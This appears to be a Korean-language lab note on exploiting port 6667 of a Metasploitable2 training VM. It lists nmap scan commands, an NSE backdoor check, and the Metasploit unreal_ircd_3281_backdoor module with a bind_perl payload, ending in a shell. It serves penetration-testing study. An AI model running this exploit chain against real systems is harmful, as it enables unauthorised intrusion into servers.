Metasploit
: 가장 유명한 Exploit 도구
버전 스캔, ALL 스캔
스크립트를 통해 취약점 확인
구글 검색 확인
Metasploit 공격
위의 단계를 따라
우분투 서버에 다양한 어플리케이션의 가장 취약한 버전을 설치한 metasploitable2의 6667번 포트 실습
sudo nmap -A 192.168.61.131 -p 6667
: 취약서버 6667번 포트 ALL 스캔
-> version: Unreal3.2.8.1
/usr/share/nmap/scripts 에서 취약점 다시 진단
sudo find . -name "unreal"
-> ./irc-unrealircd-backdoor.nse
sudo nmap --script=irc-unrealircd-backdoor.nse 192.168.61.131 -p 6667
구글 검색 : https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor/
sudo msfconsole
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload payload/cmd/unix/bind_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
탈취 성공!